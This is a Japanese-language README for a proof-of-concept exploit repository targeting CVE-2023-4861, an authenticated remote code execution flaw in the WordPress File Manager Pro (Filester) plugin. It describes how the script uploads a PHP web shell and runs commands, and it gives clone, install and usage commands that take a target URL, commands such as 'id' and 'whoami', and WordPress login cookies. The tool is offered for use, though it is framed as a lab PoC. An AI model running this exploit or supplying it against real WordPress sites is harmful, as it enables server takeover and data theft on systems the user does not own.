
WordPress File Manager Pro(Filester)における認証済みリモートコード実行の自動化された概念実証。任意のファイルアップロードを介して、ウェブシェルの展開とコマンド実行を含みます。
このリポジトリには、WordPressプラグイン File Manager Pro - Filester における 認証済みリモートコード実行 の問題である CVE-2023-4861 のPython概念実証コードが含まれています。
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+exploit.py は、公開アドバイザリに記載されているのと同じ基本的な結果を自動化します。
/var/www/html/ へのアクセスと .php アップロードを許可します。重要な実装の詳細: このPoCはターゲットのWebルートが /var/www/html/ であることを前提としています。これはリクエストデータにハードコードされており、他のラボ環境では調整が必要な場合があります。
リポジトリをクローンして移動します:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
依存関係をインストールします:
pip install requests
ヘルプを表示:
python3 exploit.py --help
基本的な例:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
任意のカスタムシェル名:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'